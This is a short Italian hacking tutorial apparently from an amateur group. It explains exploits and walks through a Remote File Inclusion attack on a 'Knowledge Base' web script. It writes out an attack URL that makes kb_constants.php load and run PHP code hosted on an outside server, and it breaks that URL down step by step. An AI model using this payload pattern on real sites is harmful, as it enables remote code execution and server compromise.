<< UnDeRVoRTeX >> << ExPlOiT >> In questa guida vedremo come funzionano in generale gli exploit. E se non sapete cosa sono ve lo dico subito... Gli exploit sono degli script, scritti in un certo linguaggio di programmazione in grado di "sfruttare" bug (falle o errori) presenti in applicazioni, spesso applicazioni web, effettuando molte volte attacchi. Gli exploit, sono molto usati nell'hacking, e proprio l'hacking oggi si basa anche molto sugli attacchi remoti di server tramite bug. Come già detto, spesso si sfruttano bug di applicazioni web, e proprio su questo che voglio farvi capire gli exploit come si usano. Immaginatevi questo sito: http://www.lol.it che usa lo script "Knowledge Base", con una versione dello script che contiene un bug in questo file http://www.lol.it/includes/includes/kb_constants.php. Bene, pensiamo che il seguente bug sia un bug RFI, ovvero Remote File Inclusion, in cui è possibile aprire o "caricare" dei file da un altro server. Come facciamo a caricare l'exploit? Prima di tutto dovremmo usare una variabile del file per caricare o aprire l'exploit, basta cercarla nel file kb_constants.php! E infine inseriamo l'exploit! Semplice: http://www.lol.it/includes/includes/kb_constants.php?module_root_path=http://www.asd.it/exploit.php -> Riepilogo <- http://www.lol.it/includes/includes/kb_constants.php -> File contenente bug ?module_root_path= -> Variabile usata per sfruttare il bug http://www.asd.it/exploit.php -> Exploit scritto in PHP Cosa c'è di più facile? :E Ovviamente esistono diversi tipi di bug in cui è possibile sfruttare il metodo RFI (Remote File Inclusion), LFI (Local file Inclusion), SQL Injection... e molti altri... presenti perlopiù su applicazioni web PHP e ASP. << WRiTeD By TheDevil >>